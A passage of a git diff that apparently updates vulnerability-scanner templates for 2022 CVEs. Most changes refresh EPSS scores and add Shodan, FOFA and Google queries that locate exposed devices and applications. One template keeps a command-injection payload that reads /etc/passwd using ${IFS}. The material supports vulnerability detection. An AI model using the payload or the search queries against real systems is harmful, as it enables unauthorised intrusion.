0.0161 + epss-percentile: 0.87425 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 111b5db77c..c4d4251323 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28079 cwe-id: CWE-89 - epss-score: 0.80212 - epss-percentile: 0.98029 + epss-score: 0.68173 + epss-percentile: 0.97965 cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 9076309976..3866b93571 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28080 cwe-id: CWE-89 - epss-score: 0.01461 - epss-percentile: 0.86424 + epss-score: 0.01814 + epss-percentile: 0.88161 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index f38137a1ca..72823ef3e3 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -15,13 +15,14 @@ info: - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5 - https://www.youtube.com/watch?v=4kHW95CMfD0 - https://nvd.nist.gov/vuln/detail/CVE-2022-28117 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N cvss-score: 4.9 cve-id: CVE-2022-28117 cwe-id: CWE-918 - epss-score: 0.03193 - epss-percentile: 0.9018 + epss-score: 0.04745 + epss-percentile: 0.92658 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 1d27898b64..9b756bc315 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -23,8 +23,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28219 cwe-id: CWE-611 - epss-score: 0.97392 - epss-percentile: 0.99909 + epss-score: 0.97453 + epss-percentile: 0.9995 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: verified: true @@ -32,6 +32,8 @@ info: vendor: zohocorp product: manageengine_adaudit_plus shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" + google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp http: diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index c610bcd0dc..f5b8472aed 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -21,13 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28363 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61062 + epss-score: 0.00336 + epss-percentile: 0.71252 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: reprisesoftware product: reprise_license_manager + shodan-query: http.html:"reprise license" + fofa-query: body="reprise license manager" + google-query: inurl:"/goforms/menu" tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware http: diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 36bde738a1..11c85365ba 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -21,13 +21,16 @@ info: cvss-score: 5.3 cve-id: CVE-2022-28365 cwe-id: CWE-425 - epss-score: 0.00689 - epss-percentile: 0.77964 + epss-score: 0.05306 + epss-percentile: 0.93052 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: reprisesoftware product: reprise_license_manager + shodan-query: http.html:"reprise license" + fofa-query: body="reprise license manager" + google-query: inurl:"/goforms/menu" tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware http: diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 4a90bb1dea..5ba768a99d 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.9 cve-id: CVE-2022-2863 cwe-id: CWE-22 - epss-score: 0.43289 - epss-percentile: 0.97257 + epss-score: 0.46632 + epss-percentile: 0.97438 cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 03e70e6f8d..ece6c2a890 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -30,6 +30,7 @@ info: vendor: dlink product: dir-816l_firmware shodan-query: http.html:"DIR-816L" + fofa-query: body="dir-816l" tags: cve2022,cve,dlink,exposure http: diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index a46c5f606e..b89b7124a5 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29004 cwe-id: CWE-79 - epss-score: 0.00218 - epss-percentile: 0.59134 + epss-score: 0.00254 + epss-percentile: 0.65186 cpe: cpe:2.3:a:phpgurukul:e-diary_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 20ab18725f..60bada6a89 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29005 cwe-id: CWE-79 - epss-score: 0.0015 - epss-percentile: 0.51178 + epss-score: 0.00205 + epss-percentile: 0.58459 cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 9c23d4c891..3aa3bf5b6e 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29006 cwe-id: CWE-89 - epss-score: 0.21257 - epss-percentile: 0.96305 + epss-score: 0.1338 + epss-percentile: 0.95581 cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 40eb33f1f7..10e67c06fc 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29007 cwe-id: CWE-89 - epss-score: 0.15861 - epss-percentile: 0.95469 + epss-score: 0.1338 + epss-percentile: 0.95581 cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index a752cb053f..8ac7e7ccac 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29009 cwe-id: CWE-89 - epss-score: 0.21257 - epss-percentile: 0.96305 + epss-score: 0.1338 + epss-percentile: 0.95581 cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml index bdf099ede5..27c001979f 100644 --- a/http/cves/2022/CVE-2022-29013.yaml +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -14,13 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29013 cwe-id: CWE-78 - epss-score: 0.83254 - epss-percentile: 0.98361 - cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* + epss-score: 0.8792 + epss-percentile: 0.98658 + cpe: cpe:2.3:h:razer:sila:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: razer - product: sila_firmware + product: sila tags: packetstorm,cve,cve2022,razer,sila,router http: diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 6fd1794a52..e1b06ad89f 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29014 - epss-score: 0.77285 - epss-percentile: 0.98135 + epss-score: 0.79802 + epss-percentile: 0.9829 cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 05c6a4b16d..9154676875 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29078 cwe-id: CWE-94 - epss-score: 0.34849 - epss-percentile: 0.97005 + epss-score: 0.28707 + epss-percentile: 0.96859 cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index cde1288f15..e0f0a073a9 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -29,6 +29,8 @@ info: vendor: hashicorp product: consul shodan-query: title:"Consul by HashiCorp" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: cve,cve2022,consul,hashicorp,ssrf,intrusive http: diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 0db78ac075..3b6365097a 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -28,6 +28,9 @@ info: max-request: 2 vendor: nagios product: nagios_xi + shodan-query: http.title:"nagios xi" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2022,redirect,nagios,nagiosxi http: diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index 38ffe1f6b1..b4868355be 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -29,6 +29,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" + fofa-query: body="solarview compact" tags: cve,cve2022,lfi,solarview,edb,contec http: diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 3f9b0f07ff..a4ab37242f 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -30,6 +30,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" + fofa-query: body="solarview compact" tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 1487e16bc8..e79c758f4d 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29349 cwe-id: CWE-79 - epss-score: 0.01698 - epss-percentile: 0.86444 + epss-score: 0.00314 + epss-percentile: 0.70155 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index be282d3374..5ba976405e 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -29,6 +29,8 @@ info: vendor: wso2 product: api_manager shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev http: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 5cdf4a3d75..a53b6d6ba5 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29548 cwe-id: CWE-79 - epss-score: 0.00299 - epss-percentile: 0.68867 + epss-score: 0.01348 + epss-percentile: 0.86109 cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: wso2 product: api_manager google-query: inurl:"carbon/admin/login" + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 tags: cve,cve2022,wso2,xss,packetstorm http: diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 8318ab5924..331b043b0a 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29775 cwe-id: CWE-287 - epss-score: 0.01088 - epss-percentile: 0.82745 + epss-score: 0.01197 + epss-percentile: 0.85119 cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: ispyconnect product: ispy shodan-query: http.html:"iSpy is running" + fofa-query: body="ispy is running" tags: cve,cve2022,ispy,auth-bypass,ispyconnect http: diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 8e51358733..e87dff8fb3 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-30073 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.57793 + epss-percentile: 0.5842 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index fa8e443a15..42de1b227b 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -14,13 +14,15 @@ info: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - https://github.com/badboycxcc/XSS - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/trhacknon/Pocingit + - https://github.com/trhacknon/XSS-CVE-2022-30489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30489 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36947 + epss-score: 0.00102 + epss-percentile: 0.41641 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,xss,wavlink,router,iot http: diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index e98b12e9d8..60a6709c6f 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30512 cwe-id: CWE-89 - epss-score: 0.02624 - epss-percentile: 0.89288 + epss-score: 0.11597 + epss-percentile: 0.9526 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index d744e95727..1e65f7cf2a 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-30513 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39401 + epss-score: 0.00112 + epss-percentile: 0.44481 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 4e8a29bb38..bccd71b102 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30525 cwe-id: CWE-78 - epss-score: 0.97482 - epss-percentile: 0.99967 + epss-score: 0.97472 + epss-percentile: 0.99965 cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index f00e70105b..17be50d07e 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3062 cwe-id: CWE-79 - epss-score: 0.0012 - epss-percentile: 0.46075 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index f912a8432c..be13eda8b4 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -30,6 +30,7 @@ info: vendor: atmail product: atmail shodan-query: http.html:"atmail" + fofa-query: body="powered by atmail" tags: cve2022,cve,atmail,xss http: diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index d36995911c..0d7912c735 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -15,13 +15,14 @@ info: - https://en.wikipedia.org/wiki/H-Sphere - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30777 cwe-id: CWE-79 epss-score: 0.00087 - epss-percentile: 0.36061 + epss-percentile: 0.36791 cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,8 @@ info: vendor: parallels product: h-sphere shodan-query: title:"h-sphere" + fofa-query: title="h-sphere" + google-query: intitle:"h-sphere" tags: cve,cve2022,parallels,hsphere,xss http: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index b411693f94..4c28485bfe 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -29,6 +29,7 @@ info: vendor: roxy-wi product: roxy-wi shodan-query: http.html:"Roxy-WI" + fofa-query: body="roxy-wi" tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi http: diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 061d0ca131..bb46253f20 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -30,6 +30,8 @@ info: vendor: gitblit product: gitblit shodan-query: http.html:"Gitblit" + fofa-query: title="gitblit" + google-query: intitle:"gitblit" tags: cve,cve2022,lfi,gitblit http: diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 5c4f56238d..e3a3702a31 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 - epss-score: 0.00231 - epss-percentile: 0.6049 + epss-score: 0.00284 + epss-percentile: 0.68595 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: http.title:"Linear eMerge" + fofa-query: title="emerge" + google-query: intitle:"linear emerge" tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 9cd6fdedb7..37e7f0d9d4 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31373 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36353 + epss-percentile: 0.37623 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" + fofa-query: body="solarview compact" tags: cve2022,cve,xss,solarview,contec http: diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 32a47a3e0f..90ee57503b 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -28,6 +28,8 @@ info: product: nex-forms framework: wordpress publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ + shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/ + fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/ tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index b2a74b78ba..b4535f5091 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: title:"eMerge" + fofa-query: title="emerge" + google-query: intitle:"linear emerge" tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index f77ae5c7be..0fb55b42d8 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31656 cwe-id: CWE-287 - epss-score: 0.75034 - epss-percentile: 0.98069 + epss-score: 0.64132 + epss-percentile: 0.97874 cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 + fofa-query: icon_hash=-1250474341 tags: cve2022,cve,vmware,lfi http: diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 63e878830a..6da156ed2b 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31798 cwe-id: CWE-384 epss-score: 0.00126 - epss-percentile: 0.46259 + epss-percentile: 0.47221 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: http.title:"eMerge" + fofa-query: title="emerge" + google-query: intitle:"linear emerge" tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index 4b923edec0..ba09e64ef6 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31814 cwe-id: CWE-78 - epss-score: 0.96552 - epss-percentile: 0.9952 + epss-score: 0.97252 + epss-percentile: 0.99847 cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 332d5df030..a0a73f46e6 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -28,6 +28,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index fa1dde8f5b..35cedf4b58 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 145a1dea6d..b97b3dc4a2 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -13,13 +13,15 @@ info: reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-31847 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31847 cwe-id: CWE-425 - epss-score: 0.01285 - epss-percentile: 0.84308 + epss-score: 0.01275 + epss-percentile: 0.85693 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +29,7 @@ info: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" + fofa-query: body="wavlink" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index bbee69b1c5..6ca41201a2 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31854 cwe-id: CWE-434 - epss-score: 0.17108 - epss-percentile: 0.95958 + epss-score: 0.26245 + epss-percentile: 0.96727 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index f475a1cadb..182a1275bf 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-31879 cwe-id: CWE-89 - epss-score: 0.05519 - epss-percentile: 0.9247 + epss-score: 0.05371 + epss-percentile: 0.93099 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index d35e7b48bc..27911724e1 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31976 cwe-id: CWE-89 - epss-score: 0.02036 - epss-percentile: 0.87769 + epss-score: 0.02266 + epss-percentile: 0.89602 cpe: 